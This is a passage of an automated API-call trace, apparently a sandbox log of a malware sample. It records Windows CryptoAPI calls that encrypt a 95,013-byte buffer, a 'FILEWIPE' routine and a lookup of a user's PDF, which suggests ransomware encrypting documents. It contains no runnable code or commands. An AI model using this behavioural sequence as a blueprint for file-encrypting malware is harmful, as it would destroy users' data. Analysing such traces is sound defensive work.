lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0035.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0035.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0035.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0035.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0035.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.647] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0035.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c958 [0035.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0035.647] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0035.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0035.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0035.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0035.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0035.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0035.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0035.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0035.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0035.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0035.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0035.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0035.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0035.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0035.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0035.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0035.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0035.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0035.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0035.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0035.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0035.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0035.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0035.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0035.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0035.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0035.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0035.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0035.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0035.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0035.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0035.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0035.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0035.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0035.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0035.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0035.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0035.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0035.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0035.650] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.650] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da158, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da158*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0035.650] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.650] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.650] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.650] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.650] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.650] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.650] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.650] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.650] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0035.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.650] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.650] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.650] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.650] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.651] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.651] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.651] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.651] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0035.651] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0035.652] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.652] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x17325, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x17330) returned 1 [0035.652] CharLowerBuffW (in: lpsz="byte[95025]", cchLength=0xb | out: lpsz="byte[95025]") returned 0xb [0035.653] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.653] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.653] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8a72e0*, pdwDataLen=0x6ae220*=0x17325, dwBufLen=0x17330 | out: pbData=0x8a72e0*, pdwDataLen=0x6ae220*=0x17330) returned 1 [0035.654] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0035.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.654] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.654] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.664] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0035.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.664] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.664] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.664] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0035.664] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0035.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.665] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.665] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.665] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0035.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.665] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.665] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0035.665] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0035.665] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0035.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0035.665] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.666] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0035.666] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.666] FreeLibrary (hLibModule=0x754b0000) returned 1 [0035.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0035.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0035.666] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0035.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0035.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.666] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b952d20, ftCreationTime.dwHighDateTime=0x1d5c04a, ftLastAccessTime.dwLowDateTime=0x545d4c30, ftLastAccessTime.dwHighDateTime=0x1d5c5e9, ftLastWriteTime.dwLowDateTime=0x545d4c30, ftLastWriteTime.dwHighDateTime=0x1d5c5e9, nFileSizeHigh=0x0, nFileSizeLow=0x17325, dwReserved0=0x0, dwReserved1=0x777648, cFileName="LCKIcVhsNU_6Z.pdf", cAlternateFileName="LCKICV~1.PDF")) returned 0x7c2100 [0035.666] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0035.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0035.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0035.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0035.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.667] CharLowerBuffW (in: lpsz="byte[95013]", cchLength=0xb | out: lpsz="byte[95013]") returned 0xb [0035.667] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0035.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.667] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0035.667] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0035.667] FreeLibrary (hLibModule=0x76b40000) returned 1 [0035.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0035.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0035.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0035.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0035.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0035.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0035.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0035.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0035.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0035.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0035.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0035.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0035.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0035.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0035.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0035.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0035.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.668] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0035.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0035.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.668] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") 